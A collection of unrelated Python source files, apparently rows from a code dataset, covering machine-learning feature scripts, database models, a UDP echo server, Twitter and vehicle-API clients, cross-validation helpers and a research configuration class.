print "python get_word_interaction.py basic_users_features_file basic_items_features_file user_item_pairs_file output_file"
sys.exit(0)
user_feature_file = sys.argv[1]
item_feature_file = sys.argv[2]
user_item_file = sys.argv[3]
output_file = sys.argv[4]
userJobrole, userStudyField, userBasicFeature = load_users_jobroles_and_studyFields(user_feature_file)
itemTitle, itemTag, itemBasicFeature = load_items_titles_and_tags(item_feature_file)
userItemPairs = load_user_item_pairs(user_item_file)
with open(output_file, "w") as fout:
line = ""
print len(userItemPairs)
counter = 0
for pair in userItemPairs:
counter += 1
line = userBasicFeature[pair[0]] + " " + itemBasicFeature[pair[1]]
jobroles = userJobrole[pair[0]]
studyFields = userStudyField[pair[0]]
titles = itemTitle[pair[1]]
tags = itemTag[pair[1]]
line += " " + get_interaction_and_jaccard(jobroles, titles)
line += " " + get_interaction_and_jaccard(jobroles, tags)
line += " " + get_interaction_and_jaccard(studyFields, titles)
line += " " + get_interaction_and_jaccard(studyFields, tags)
if len(pair) >= 3:
fout.write(pair[2] + " " + get_xgboost_input(line)+"\n")
else:
fout.write(get_xgboost_input(line)+"\n")
if counter%10000 == 0:
print counter
print "finish!"
|
992,131 | a4b78303ba485dd0e85b9357088716f8310e0714 | from collections import defaultdict
class River(object):
def __init__(self, numOfElements=100):
self.rank = [0 for _ in range(numOfElements)]
self.parents = [0 for _ in range(numOfElements)]
self.n = numOfElements
def init (self, numOfElements):
self.makeSet()
def makeSet(self):
for i in range(self.n):
self.parents[i] = i
def union(self, x, y):
parentX = self.find(x)
parentY = self.find(y)
if parentX == parentY:
return
if self.rank[parentX] > self.rank[parentY]:
self.parents[parentY] = parentX
elif self.rank[parentX] < self.rank[parentY]:
self.parents[parentX] = parentY
else:
self.parents[parentX] = parentY
self.rank[parentY] += 1
def find(self, x):
parentX = self.parents[x]
if x != parentX:
parentX = self.find(parentX)
return parentX
def riverSizes(matrix):
global i, j
if not matrix:
return []
rowCount, colCount = len(matrix), len(matrix[0])
djs = River()
for i in range(rowCount):
for j in range(colCount):
val = matrix[i][j]
if val == 0:
continue
if i + 1 < rowCount and matrix[i + 1][j] == 1:
djs.union(i * colCount + j, (i + 1) * colCount + j)
if i - 1 >= 0 and matrix[i - 1][j] == 1:
djs.union(i * colCount + j, (i - 1) * colCount + j)
if j + 1 < colCount and matrix[i][j + 1] == 1:
djs.union(i * colCount + j, (i) * colCount + j + 1)
if j - 1 >= 0 and matrix[i][j - 1] == 1:
djs.union(i * colCount + j, (i) * colCount + j - 1)
islands = defaultdict(int)
for i in range(rowCount):
for j in range(colCount):
if matrix[i][j] == 1:
val = i * colCount + j
parent = djs.find(val)
islands[parent] += 1
return islands.values()
|
992,132 | e9824ab0d47279c78d3029487d9b5c93f8c004f9 | from ._stream import Stream
from ._hoverlabel import Hoverlabel
from plotly.graph_objs.heatmap import hoverlabel
from ._colorbar import ColorBar
from plotly.graph_objs.heatmap import colorbar
|
992,133 | 47e045d634924761b2f6073155b174b1c55666d1 |
#TODO: inheritate from bluecopper base class
class TFT_Experimen(Base):
__tablename__ = 'tft_experiment'
exp_id = Column('exp_id', String)
schema_id = Column('schema_id', String)
# @validates()
def __repr__ (self):
return "<TFT_Experiment(exp_id='%s', schema_id='%s')>" % (
self.exp_id, self.schema_id
)
#TODO: inheritate from bluecopper base class
class TFT_Experiment_Attribute(Base):
__tablename__ = 'tft_experiment_attributes'
exp_id = Column('exp_id', String)
attr_name_id = Column('attr_name_id', String)
property_id = Column('property_id', String)
# @validates()
def __repr__ (self):
return "<TFT_Experiment_Attributes(exp_id='%s', attr_name_id='%s', property_id='%s')>" % (
self.exp_id, self.attr_name_id, self.property_id
)
#TODO: inheritate from bluecopper base class
class TFT_Attribute_Name(Base):
__tablename__ = 'tft_attribute_names'
attr_name_id = Column('attr_name_id', String)
attr_name = Column('attr_name', String)
# @validates()
def __repr__ (self):
return "<TFT_Attribute_Names(attr_name_id='%s', attr_name='%s')>" % (
self.attr_name_id, self.attr_name
)
#TODO: inheritate from bluecopper base class
class TFT_Schema_Att(Base):
__tablename__ = 'tft_schema_attr'
schema_id = Column('schema_id', String)
schema_name = Column('schema_name', String)
attr_name_id = Column('attr_name_id', String)
attr_is_required = Column('attr_is_required', String)
attr_is_group = Column('attr_is_group', String)
attr_is_identifier = Column('attr_is_identifier', String)
attr_is_annotation = Column('attr_is_annotation', String)
# @validates()
def __repr__ (self):
return "<TFT_Schema_Attr(schema_id='%s', schema_name='%s', attr_name_id='%s', attr_is_required='%s', attr_is_group='%s', attr_is_identifier='%s', attr_is_annotation='%s')>" % (
self.schema_id, self.schema_name, self.attr_name_id, self.attr_is_required, self.attr_is_group, self.attr_is_identifier, self.attr_is_annotation
)
#TODO: inheritate from bluecopper base class
class TFT_Identifier_Sourc(Base):
__tablename__ = 'tft_identifier_source'
attr_name_id = Column('attr_name_id', String)
attr_url = Column('attr_url', String)
# @validates()
def __repr__ (self):
return "<TFT_Identifier_Source(attr_name_id='%s', attr_url='%s')>" % (
self.attr_name_id, self.attr_url
)
#TODO: inheritate from bluecopper base class
class TFT_Experiment_Ru(Base):
__tablename__ = 'tft_experiment_run'
run_id = Column('run_id', String)
exp_id = Column('exp_id', String)
# @validates()
def __repr__ (self):
return "<TFT_Experiment_Run(run_id='%s', exp_id='%s')>" % (
self.run_id, self.exp_id
)
#TODO: inheritate from bluecopper base class
class TFT_Run_Sampl(Base):
__tablename__ = 'tft_run_sample'
run_id = Column('run_id', String)
sample_id = Column('sample_id', String)
# @validates()
def __repr__ (self):
return "<TFT_Run_Sample(run_id='%s', sample_id='%s')>" % (
self.run_id, self.sample_id
)
#TODO: inheritate from bluecopper base class
class TFT_Exp_Analysi(Base):
__tablename__ = 'tft_exp_analysis'
exp_id = Column('exp_id', String)
analysis_id = Column('analysis_id', String)
# @validates()
def __repr__ (self):
return "<TFT_Exp_Analysis(exp_id='%s', analysis_id='%s')>" % (
self.exp_id, self.analysis_id
)
#TODO: inheritate from bluecopper base class
class TFT_Sample_Attribute(Base):
__tablename__ = 'tft_sample_attributes'
sample_id = Column('sample_id', String)
attr_name_id = Column('attr_name_id', String)
attr_value_id = Column('attr_value_id', String)
# @validates()
def __repr__ (self):
return "<TFT_Sample_Attributes(sample_id='%s', attr_name_id='%s', attr_value_id='%s')>" % (
self.sample_id, self.attr_name_id, self.attr_value_id
)
#TODO: inheritate from bluecopper base class
class TFT_Analysis_Comparison(Base):
__tablename__ = 'tft_analysis_comparisons'
analysis_id = Column('analysis_id', String)
comparison_id = Column('comparison_id', String)
# @validates()
def __repr__ (self):
return "<TFT_Analysis_Comparisons(analysis_id='%s', comparison_id='%s')>" % (
self.analysis_id, self.comparison_id
)
#TODO: inheritate from bluecopper base class
class TFT_Property_Relation(Base):
__tablename__ = 'tft_property_relations'
relation_id = Column('relation_id', String)
parent_prop = Column('parent_prop', String)
child_prop = Column('child_prop', String)
# @validates()
def __repr__ (self):
return "<TFT_Property_Relations(relation_id='%s', parent_prop='%s', child_prop='%s')>" % (
self.relation_id, self.parent_prop, self.child_prop
)
#TODO: inheritate from bluecopper base class
class TFT_Comparison(Base):
__tablename__ = 'tft_comparisons'
comparison_id = Column('comparison_id', String)
attr_value_id_a = Column('attr_value_id_a', String)
attr_value_id_b = Column('attr_value_id_b', String)
contrast = Column('contrast', String)
comparison_name = Column('comparison_name', String)
# @validates()
def __repr__ (self):
return "<TFT_Comparisons(comparison_id='%s', attr_value_id_a='%s', attr_value_id_b='%s', contrast='%s', comparison_name='%s')>" % (
self.comparison_id, self.attr_value_id_a, self.attr_value_id_b, self.contrast, self.comparison_name
)
#TODO: inheritate from bluecopper base class
class (Base):
__tablename__ = ''
|
992,134 | f0c19a53683b0e8779713748b3beac6d9925575d | from socket import *
server_port = 12000
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.bind(("localhost", server_port))
print(f"* Server started at port {server_port}")
while True:
message, client_address = server_socket.recvfrom(2048)
print(client_address, message.decode())
modified_message = message.upper()
server_socket.sendto(modified_message, client_address)
|
992,135 | 1165693ee6a0049a5c2b1a2639e153056abed6b7 | import shlex
import subprocess
def exec_command(cmd: str):
command = shlex.split(cmd)
result = subprocess.Popen(command, stdout=subprocess.PIPE, universal_newlines=True)
return result.stdout.read()
def query_number_gpus():
output = exec_command('nvidia-smi --query-gpu=gpu_name,gpu_bus_id,vbios_version --format=csv')
return len(output.split('\n')) - 2 # minus header, minus last new line
|
992,136 | f04bf1eb2b87e257386e6bfef4ea3ce7b5203fe1 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: alfred_yuan
# Created on 2019-01-28
import threading
import time
class Box(object):
lock = threading.RLock()
def __init__(self):
self.total_items = 0
def execute(self, n):
Box.lock.acquire()
self.total_items += n
Box.lock.release()
def add(self):
Box.lock.acquire()
self.execute(1)
Box.lock.release()
def remove(self):
Box.lock.acquire()
self.execute(-1)
Box.lock.release()
## those two fuctions run n is separate
## thread and call the Box's methods
def adder(box, items):
while items > 0:
print("add 1 item in the box")
box.add()
time.sleep(1)
items -=1
def remove(box, items):
while items > 0:
print("remove 1 item in the box")
box.remove()
time.sleep(1)
items -= 1
## the main program build some threads
## and make sure it works
if __name__ == '__main__':
items = 5
print("putting %s items in the box" % items)
box = Box()
t1 = threading.Thread(target=adder, args=(box, items))
t2 = threading.Thread(target=remove, args=(box, items))
t1.start()
t2.start()
t1.join()
t2.join()
print("%s items still remain in the box " % box.total_items) |
992,137 | 0dfeb683cbca8ff5d2e7278ed82a8a93f1f7c320 | """ Task 3
Создать два списка с различным количеством элементов.
В первом должны быть записаны ключи, во втором — значения.
Необходимо написать функцию, создающую из данных ключей и значений словарь.
Если ключу не хватает значения, в словаре для него должно сохраняться
значение None. Значения, которым не хватило ключей, необходимо отбросить.
"""
def get_dict(keys: iter, values: iter) -> dict:
"""Создание словаря из ключей и значений,
добавление None для ключей без значений
:param keys: iter итерируемый объект с ключами
:param values: iter итерируемый объект со значениями
:return: dict словарь из входных итерируемых объектов
"""
len_keys = len(keys)
len_values = len(values)
if len_values < len_keys:
values_copy = values[:]
for _ in range(len_keys - len_values):
values_copy.append(None)
new_dict = {key: value for key, value in zip(keys, values_copy)}
else:
new_dict = {key: value for key, value in zip(keys, values)}
return new_dict
if __name__ == '__main__':
keys_list = [1, 'abc', (1, 2), 5, 9, 0]
values_list = ['lorem', 'ipsum', {'key': 'val'}]
print(get_dict(keys_list, values_list))
|
992,138 | 8a64037d01157dab1b6c574190b13e279d6140c1 | import zacks #1
import bloomberg #2
import cnbc #3
import investing #4
import fidelity #5
import yahoo #6
import json
import threading
import datetime
from datetime import timedelta
from datetime import datetime
def ZACKS(start_date, stop_date,output_path):
zacks.func(start_date, stop_date,output_path)
def BLOOMBERG(start_date, stop_date,output_path):
bloomberg.func(start_date, stop_date,output_path)
def CNBC(start_date, stop_date,output_path):
cnbc.func(start_date, stop_date,output_path)
def INVESTING(start_date, stop_date,output_path):
investing.func(start_date, stop_date,output_path)
def FIDELITY(start_date, stop_date,output_path):
fidelity.func(start_date, stop_date,output_path)
def YAHOO(start_date, stop_date,output_path):
yahoo.func(start_date, stop_date,output_path)
with open(r'C:\Users\hp\Desktop\scrapingProject\calender\calendarScriptsTogether\settingsFileCalendar.txt') as json_file:
data = json.load(json_file)
site = (data['sites'])
start_date = (data['start_date'])
stop_date = (data['stop_date'])
output_path = (data['output_path'])
simultanious = (data['simultanious'])
mode_of_dates = (data['mode_of_dates'])
days_for_mode_2 = (data['days_for_mode_2'])
#here take option 0 or 1 from the json file to see if we want simultaneous running or one at a time running.
if mode_of_dates == 1:
if simultanious == 1:
if 1 in site:
print("gonna start zacks")
threading.Thread(target=ZACKS,args=([start_date,stop_date,output_path])).start()
if 2 in site:
print("gonna start bloomberg")
threading.Thread(target=BLOOMBERG,args=([start_date,stop_date,output_path])).start()
if 3 in site:
print("gonna start cnbc")
threading.Thread(target=CNBC,args=([start_date,stop_date,output_path])).start()
if 4 in site:
print("gonna start investing")
threading.Thread(target=INVESTING,args=([start_date,stop_date,output_path])).start()
if 5 in site:
print("gonna start fidelity")
threading.Thread(target=FIDELITY,args=([start_date,stop_date,output_path])).start()
if 6 in site:
print("gonna start yahoo")
threading.Thread(target=YAHOO,args=([start_date,stop_date,output_path])).start()
elif simultanious == 0:
if 1 in site:
print("gonna start zacks")
ZACKS(start_date,stop_date,output_path)
if 2 in site:
print("gonna start bloomberg")
BLOOMBERG(start_date,stop_date,output_path)
if 3 in site:
print("gonna start cnbc")
CNBC(start_date,stop_date,output_path)
if 4 in site:
print("gonna start investing")
INVESTING(start_date,stop_date,output_path)
if 5 in site:
print("gonna start fidelity")
FIDELITY(start_date,stop_date,output_path)
if 6 in site:
print("gonna start yahoo")
YAHOO(start_date,stop_date,output_path)
elif mode_of_dates == 2:
start_date = datetime.today().strftime("%d-%m-%Y")
start = datetime.strptime(start_date, "%d-%m-%Y")
finish = start + timedelta(days=days_for_mode_2)
stop_date = finish.strftime("%d-%m-%Y")
if simultanious == 1:
if 1 in site:
print("gonna start zacks")
threading.Thread(target=ZACKS,args=([start_date,stop_date,output_path])).start()
if 2 in site:
print("gonna start bloomberg")
threading.Thread(target=BLOOMBERG,args=([start_date,stop_date,output_path])).start()
if 3 in site:
print("gonna start cnbc")
threading.Thread(target=CNBC,args=([start_date,stop_date,output_path])).start()
if 4 in site:
print("gonna start investing")
threading.Thread(target=INVESTING,args=([start_date,stop_date,output_path])).start()
if 5 in site:
print("gonna start fidelity")
threading.Thread(target=FIDELITY,args=([start_date,stop_date,output_path])).start()
if 6 in site:
print("gonna start yahoo")
threading.Thread(target=YAHOO,args=([start_date,stop_date,output_path])).start()
elif simultanious == 0:
if 1 in site:
print("gonna start zacks")
ZACKS(start_date,stop_date,output_path)
if 2 in site:
print("gonna start bloomberg")
BLOOMBERG(start_date,stop_date,output_path)
if 3 in site:
print("gonna start cnbc")
CNBC(start_date,stop_date,output_path)
if 4 in site:
print("gonna start investing")
INVESTING(start_date,stop_date,output_path)
if 5 in site:
print("gonna start fidelity")
FIDELITY(start_date,stop_date,output_path)
if 6 in site:
print("gonna start yahoo")
YAHOO(start_date,stop_date,output_path) |
992,139 | 3846d4250f5f43cdc8311b3a2f6008e61acfeb9a | '''
This file will hold logic for n-fold cross validation.
Methods:
*generateCrossValidationSets(X, Y, k=5, trainingMethod=None) normal creation of cross validation sets.
*leaveOneOutCrossValidation(X,Y, trainingMethod=None) has test set of length 1. All others become part of training set.
'''
import numpy as np
import random
def generateCrossValdiationSets(X, Y, k=5, trainingMethod=None):
'''
Generate each combination of test and validation sets.
Providing a training method will automatically run the trainingMethod provided.
If it is not provided the train/test set combo is added to a folds list and returned.
Parameters:
X: The list of parameters
Y: The list of labels
k: how many partitions to create
trainingMethod: a function that should have X,Y as its parameters that will be called every time a partition is created
Result:
None if trainingMethod is provided. Else folds is returned which is a list of every combination of train and test sets.
'''
#calculate the size of each partition
size = np.shape(X)[0]
size /= k
#holds the final datasets
folds = []
#randomize dataset order
indexOrdering = getRandomOrdering(X)
#partition
for testSetPart in range(k):
index = 0
currSet = []
#for each partition
for i in range(k):
partX = []
partY = []
#for each item that would belong in the first partition
for j in range(int(size)):
#add the item
partX.append(X[indexOrdering[index]])
partY.append(Y[indexOrdering[index]])
#move index forward
index += 1
#add this to this folds set
currSet.append((partX, partY))
#choose the set marked by testSetPart as the partition that will be the test set.
testX = currSet[testSetPart][0]
testY = currSet[testSetPart][1]
trainX = []
trainY = []
#combine other sets
for i in range(k):
#if pos i is not delegated as the testSet, append its items to the train set
if i != testSetPart:
#get the x, y sets at this index
currX, currY = currSet[i]
#for each item
for j in range(len(currX)):
#add them to the training set
trainX.append(currX[j])
trainY.append(currY[j])
#if a method is provided. this directly runs that trainer. This can save memory in preventing the creation of folds
if trainingMethod != None:
trainingMethod((np.array(trainX), np.array(trainY), np.array(testX), np.array(testY)))
else:
folds.append((np.array(trainX), np.array(trainY), np.array(testX), np.array(testY)))
return folds
def leaveOneOutCrossValidation(X,Y, trainingMethod=None):
'''
Creates each possibility for leave one out cross validation
Note:
It does not seem ideal to run this without providing a trainingMethod.
Parameters:
X: The list of parameters
Y: The list of labels
trainingMethod: a function that should have X,Y as its parameters that will be called every time a partition is created
Result:
None if trainingMethod is provided. Else folds is returned which is a list of every combination of train and test sets.
'''
#get size of input
size = np.shape(X)[0]
#get shuffler
indexOrdering = getRandomOrdering(X)
#holds the output datasets
folds = []
#holds the shuffled data
shuffledX = []
shuffledY = []
#shuffle data
for i in indexOrdering:
shuffledX.append(X[i])
shuffledY.append(Y[i])
#for each index in the size
#each index will be a test sample
for testExample in range(int(size)):
#define test to be the testExample index
testX = shuffledX[testExample]
testY = shuffledY[testExample]
#define rest to be training
trainX = np.delete(np.copy(shuffledX), testExample)
trainY = np.delete(np.copy(shuffledY), testExample)
if trainingMethod != None:
trainingMethod((np.array(trainX), np.array(trainY), np.array(testX), np.array(testY)))
else:
folds.append((np.array(trainX), np.array(trainY), np.array(testX), np.array(testY)))
return folds
def getRandomOrdering(X):
'''
Instead of shuffling an index, this generates a shuffled list of indecies
Parameters:
X: List of parameters to learn on
Result:
indexOrdering: A list of shuffled indexes. same length as X.
'''
indexOrdering = []
size = np.shape(X)[0]
for i in range(int(size)):
indexOrdering.append(i)
random.shuffle(indexOrdering)
return indexOrdering |
992,140 | 53b6ed510d2c0b1205c33203bfab3844a01662e3 | from __future__ import annotations
from typing import Dict, Union
import requests
from pvaw.constants import VEHICLE_API_PATH
from pvaw.results import Results, ResultsList
class Manufacturer(Results):
def __init__(self, man_id: Union[str, int], results_dict: Dict[str, str]):
super().__init__(man_id, results_dict)
self.common_name = results_dict["Mfr_CommonName"]
self.name = results_dict["Mfr_Name"]
self.vehicle_types = [d["Name"] for d in results_dict["VehicleTypes"]]
self.id = results_dict["Mfr_ID"]
def get_manufacturers(m_type: str = None, page: int = 1) -> ResultsList:
args = ["format=json"]
if m_type is not None:
if not isinstance(m_type, str):
raise TypeError(f"'m_type' must be a str")
m_type_str = "%20".join(m_type.split())
args.append(f"ManufacturerType={m_type_str}")
if not isinstance(page, int):
raise TypeError("'page' parameter must be an int")
args.append(f"page={page}")
args_str = "&".join(args)
path = f"{VEHICLE_API_PATH}getallmanufacturers?{args_str}"
response = requests.get(path)
results_list = response.json()["Results"]
return ResultsList(
[
Manufacturer(results_dict["Mfr_ID"], results_dict)
for results_dict in results_list
]
)
def get_manufacturer_details(manufacturer_name_or_id: Union[str, int]) -> Manufacturer:
if not isinstance(manufacturer_name_or_id, (str, int)):
raise TypeError("'manufacturer_name_or_id' must be a str or int")
path = f"{VEHICLE_API_PATH}GetManufacturerDetails/{manufacturer_name_or_id}?format=json"
response = requests.get(path)
results_list = response.json()["Results"]
return ResultsList(
[
Manufacturer(results_dict["Mfr_ID"], results_dict)
for results_dict in results_list
]
)
|
992,141 | c9867ed99f456907f88f3a1a923c51360ca08d9b | import pymongo
import Twitter_Request
import requests as r
import json
import Twitter_Token_Utils
import hashlib
import time
def check_update(file_hash):
f = open("user_ids.txt",'rb')
hashed_file = hashlib.md5(f.read()).hexdigest()
f.close()
return hashed_file == file_hash
def update_search_terms(search_terms):
f = open("user_ids.txt","r")
for term in f:
if(not (term in search_terms.keys())):
search_terms[term.rstrip()] = 1
f.close()
return search_terms
def get_tweets(params, term, since_id, collection):
params['user_id'] = term
params['since_id'] = since_id
TR = Twitter_Request.Request(params, user=True).get_request(custom_query = True)
TR = TR.prepare()
session = r.Session()
resp = session.send(TR)
print(resp.text)
tweets = json.loads(resp.text)
ret_val = since_id
try:
for each in tweets:
print(each['created_at'], each['id'])
collection.insert_one(each)
ret_val = tweets['search_metadata']['max_id']
except Exception as e:
print(e)
session.close()
time.sleep(10)
return ret_val
# return tweets['search_metadata']['max_id']
# myclient = pymongo.MongoClient("mongodb://loc")
def main():
tokens = Twitter_Token_Utils.get_tokens()
params = {}
params["oauth_consumer_key"] = tokens['API']
params["oauth_access_key"] = tokens ['ACCESS']
params["oauth_consumer_key_secret"] = tokens["API_SECRET"]
params["oauth_access_key_secret"] = tokens ["ACCESS_SECRET"]
params['url'] = "https://api.twitter.com/1.1/statuses/user_timeline.json"
params['request_type'] = "GET"
params['count'] = 200
# params['result_type'] = "recent"
f = open("user_ids.txt",'rb')
file_hash = hashlib.md5(f.read()).hexdigest()
f.close()
search_terms = {}
search_terms = update_search_terms(search_terms)
print(search_terms)
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
twitter_db = myclient["twitter_data"]
collection = twitter_db["user_tweets"]
# get_tweets(params, "Donald Trump",search_terms['Donald Trump'], collection)
while(True):
if (not check_update(file_hash)):
search_terms = update_search_terms(search_terms)
for each in search_terms:
search_terms[each] = get_tweets(params, each, search_terms[each],collection)
main()
|
992,142 | d66d7afd3545e0f292a4c28898890b85e6ed2b46 | from utils.mappers import *
from utils.scn_libs import *
from SimpleXMLRPCServer import SimpleXMLRPCServer
from SimpleXMLRPCServer import SimpleXMLRPCRequestHandler
import xml.dom.minidom
import xml.dom
import collections
import types
import os
class start_rpc_server:
def __init__(self):
server = SimpleXMLRPCServer(("192.168.0.1",12306),requestHandler=RequestHandler)
server.register_instance(squish_rpc_server())
print 'server started and listening on port 12306'
server.serve_forever()
# Restrict to a particular path.
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)
class squish_rpc_server(object):
def __init__(self):
self._scn_mapper = nmon_scn_mapper(versatile_lib, n_mon_lib)
self._td_mapper = testdata_OM_mapper(None, None)
self._xml_handler = xml_handler('1.0', None)
def perform_GUI_test(self, xml_data):
print 'received data %s' % xml_data
paris = self._xml_handler.handle(xml_data)
print paris
for item in paris:
print item
for item in paris:
self._scn_mapper.get_scn(item.get_name())(self._scn_mapper, self._td_mapper.get_data(item.get_value()))
return True
|
992,143 | 938301a65e55e44aa4f2d5190d66952414875028 | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 28 09:58:47 2016
@author: Eli Van Cleve
"""
import numpy as np
#import csv
import pandas as pd
#dir = '/mnt/g/Eli/RadiaBeam/SQF/'
dir = 'G:/Eli/RadiaBeam/SQF/'
filename = input ("Enter File Name: ")
save = filename[:-4]+'-clean.csv'
print (dir+filename)
data = pd.read_csv(dir+filename, error_bad_lines=False)
Lsize = len(data.Freq)
#Lsize = len(data.lambda(GHz))
colN = len(data.iloc[0])
colNa = np.array([])
for col in data.columns:
colNa = np.append(colNa,col)
StoreData = []
dataA = data.to_numpy()
leng = len(dataA)
for i in range(leng):
if (9 > data.Freq[i] > 4):
StoreData.append(dataA[i])
df = pd.DataFrame(StoreData, columns = colNa)
print (df)
df.to_csv(dir+save, index = False)
|
992,144 | 35bc20269914b5396650fac7b79e8cf342c4e47c | # -*- coding: utf-8 -*-
"""Configuration parameters for each dataset and task."""
import logging
from math import ceil
import os
from os import path as osp
from colorlog import ColoredFormatter
from common.config import Config
class ResearchConfig(Config):
"""
A class to configure global or dataset/task-specific parameters.
Inputs (see common.config.py for parent arguments):
Dataset/task:
- net_name: str, name of trained model
- phrase_recall: bool, whether to evaluate phrase recall
- test_dataset: str or None, dataset to evaluate
Data handling params:
- annotations_per_batch: int, number of desired annotations
per batch on average, in terms of relations or objects
- augment_annotations: bool, distort boxes to augment
Evaluation params:
- compute_accuracy: bool, measure accuracy, not recall
- use_merged: bool, use merged annotations in evaluation
Loss functions:
- use_multi_tasking: bool, use multi-tasking to
separately decide for object relevance
- use_weighted_ce: bool, use weighted cross-entropy
Training params:
- batch_size: int or None, batch size in images (if custom)
- epochs: int or None, number of training epochs
- learning_rate: float, learning rate of classifier
- weight_decay: float, weight decay of optimizer
Learning rate policy:
- apply_dynamic_lr: bool, adapt lr to preserve
lr / annotations per batch
- use_early_stopping: bool, lr policy with early stopping
- restore_on_plateau: bool, whether to restore checkpoint
on validation metric's plateaus (only effective in early
stopping)
- patience: int, number of epochs to consider a plateau
General:
- commit: str, commit name to tag model
- num_workers: int, workers employed by the data loader
"""
def __init__(self, net_name='', phrase_recall=False, test_dataset=None,
annotations_per_batch=128, augment_annotations=True,
compute_accuracy=False, use_merged=False,
use_multi_tasking=True,
use_weighted_ce=False, batch_size=None, epochs=None,
learning_rate=0.002, weight_decay=None,
apply_dynamic_lr=False, use_early_stopping=True,
restore_on_plateau=True, patience=1, commit='', num_workers=2,
**kwargs):
"""Initialize configuration instance."""
super().__init__(**kwargs)
self.net_name = '_'.join([
net_name,
(self.task if self.task not in {'sgcls', 'sggen'} else 'predcls'),
self.dataset if self.dataset != 'UnRel' else 'VRD'
])
self.phrase_recall = phrase_recall
self.test_dataset = (
self.dataset if test_dataset is None
else test_dataset
)
self._annotations_per_batch = annotations_per_batch
self.augment_annotations = augment_annotations
self.use_multi_tasking = use_multi_tasking
self.use_weighted_ce = use_weighted_ce
self.compute_accuracy = compute_accuracy and self.task == 'preddet'
self.use_merged = use_merged
self._batch_size = batch_size
self._epochs = epochs
self.learning_rate = learning_rate
self._weight_decay = weight_decay
self.apply_dynamic_lr = apply_dynamic_lr
self.use_early_stopping = use_early_stopping
self.restore_on_plateau = restore_on_plateau
self.patience = patience
self.commit = (
commit + '_' + self.net_name if commit != ''
else self.net_name
)
self.num_workers = num_workers
self._set_dataset_task_annos_per_img()
self._set_logger()
def reset(self, custom_dataset=None):
"""Reset instance to handle another dataset."""
self.dataset = (
self.test_dataset if custom_dataset is None
else custom_dataset
)
self._set_dataset_classes(self.dataset)
def _set_dataset_task_annos_per_img(self):
"""
Different number of image-wise annotations per dataset-task.
All fields except for 'objects' refer to predicate annotations:
- If duplicates_filtered, clear relations annotated > 1 time
- If predicates_filtered, sample a single predicate per pair
- If pairs, use all possible pairs of objects
"""
self._annos_per_img = {
'VG200': {
'relations': 6.98,
'duplicates_filtered': 4.69,
'predicates_filtered': 4.45,
'objects': 10.87,
'pairs': 146.3,
'max_objects': 45,
},
'VG80K': {
'relations': 21.96,
'duplicates_filtered': 18.89,
'predicates_filtered': 18.1,
'objects': 23.48,
'pairs': 696.85,
'max_objects': 25
},
'VGMSDN': {
'relations': 11.02,
'duplicates_filtered': 9.13,
'predicates_filtered': 8.79,
'objects': 12.48,
'pairs': 190.05,
'max_objects': 83
},
'VGVTE': {
'relations': 10.94,
'duplicates_filtered': 9.28,
'predicates_filtered': 9.03,
'objects': 13.04,
'pairs': 243.76,
'max_objects': 110
},
'VRD': {
'relations': 8.02,
'duplicates_filtered': 7.89,
'predicates_filtered': 7.13,
'objects': 7,
'pairs': 52.98,
'max_objects': 21
},
'VrR-VG': {
'relations': 3.45,
'duplicates_filtered': 3.03,
'predicates_filtered': 2.97,
'objects': 4.79,
'pairs': 34.63,
'max_objects': 64
},
'sVG': {
'relations': 10.89,
'duplicates_filtered': 8.36,
'predicates_filtered': 8.11,
'objects': 11.39,
'pairs': 195.95,
'max_objects': 119
},
'UnRel': {
'relations': 8.02,
'duplicates_filtered': 7.89,
'predicates_filtered': 7.13,
'objects': 7,
'pairs': 52.98,
'max_objects': 21
},
'COCO': {
'relations': 0,
'duplicates_filtered': 0,
'predicates_filtered': 0,
'objects': 12,
'pairs': 0,
'max_objects': 110,
},
}
def _set_logger(self):
"""Configure logger."""
self.logger = logging.getLogger(__name__)
self.logger.setLevel(logging.DEBUG)
stream = logging.StreamHandler()
stream.setFormatter(ColoredFormatter(
'%(log_color)s%(asctime)s%(reset)s - %(levelname)s - %(message)s'))
self.logger.addHandler(stream)
@property
def annotations_per_batch(self):
"""Return batch size in terms of annotations."""
if self._batch_size is None or self.task in {'objdet', 'sggen'}:
return self._annotations_per_batch
annos_per_img = self._annos_per_img[self.dataset]
if self.task in {'predcls', 'sgcls'}:
annos_per_img = annos_per_img['pairs']
elif self.task == 'objcls':
annos_per_img = annos_per_img['objects']
elif self.task == 'preddet' and self.filter_multiple_preds:
annos_per_img = annos_per_img['predicates_filtered']
elif self.task == 'preddet' and self.filter_duplicate_rels:
annos_per_img = annos_per_img['duplicates_filtered']
elif self.task == 'preddet':
annos_per_img = annos_per_img['relations']
return annos_per_img * self._batch_size
@property
def batch_size(self):
"""Return batch size in terms of images."""
if self._batch_size is not None:
return self._batch_size # custom batch size defined
if self.task == 'objdet':
return 8
annos_per_img = self._annos_per_img[self.dataset]
if self.task in {'predcls', 'sgcls'}:
annos_per_img = annos_per_img['pairs']
elif self.task == 'objcls':
annos_per_img = annos_per_img['objects']
elif self.task == 'preddet' and self.filter_multiple_preds:
annos_per_img = annos_per_img['predicates_filtered']
elif self.task == 'preddet' and self.filter_duplicate_rels:
annos_per_img = annos_per_img['duplicates_filtered']
elif self.task in {'preddet', 'sggen'}:
annos_per_img = annos_per_img['relations']
batch_size = ceil(self._annotations_per_batch / annos_per_img)
return max(batch_size, 2)
@property
def epochs(self):
"""Return number of training epochs."""
if self._epochs is not None:
return self._epochs
return 50 if self.use_early_stopping else 10
@property
def logdir(self):
"""Return path of stored Tensorboard logs."""
return osp.join('runs/', self.net_name, '')
@property
def max_obj_dets_per_img(self):
"""Return number of maximum object detections per image."""
return min(64, self._annos_per_img[self.dataset]['max_objects'])
@property
def paths(self):
"""Return a dict of paths useful to train/test/inference."""
paths = {
'json_path': self._json_path,
'models_path': osp.join(self.prerequisites_path,
'models', self.commit, ''),
'results_path': osp.join(self.prerequisites_path,
'results', self.commit, '')
}
if not osp.exists(osp.join(self.prerequisites_path, 'results', '')):
os.mkdir(osp.join(self.prerequisites_path, 'results', ''))
if not osp.exists(osp.join(self.prerequisites_path, 'models', '')):
os.mkdir(osp.join(self.prerequisites_path, 'models', ''))
for path in paths.values():
if not osp.exists(path):
os.mkdir(path)
return paths
@property
def weight_decay(self):
"""Return weight decay for an optimizer."""
if self._weight_decay is not None:
return self._weight_decay
return 5e-5 if 'VG' in self.dataset else 5e-4
|
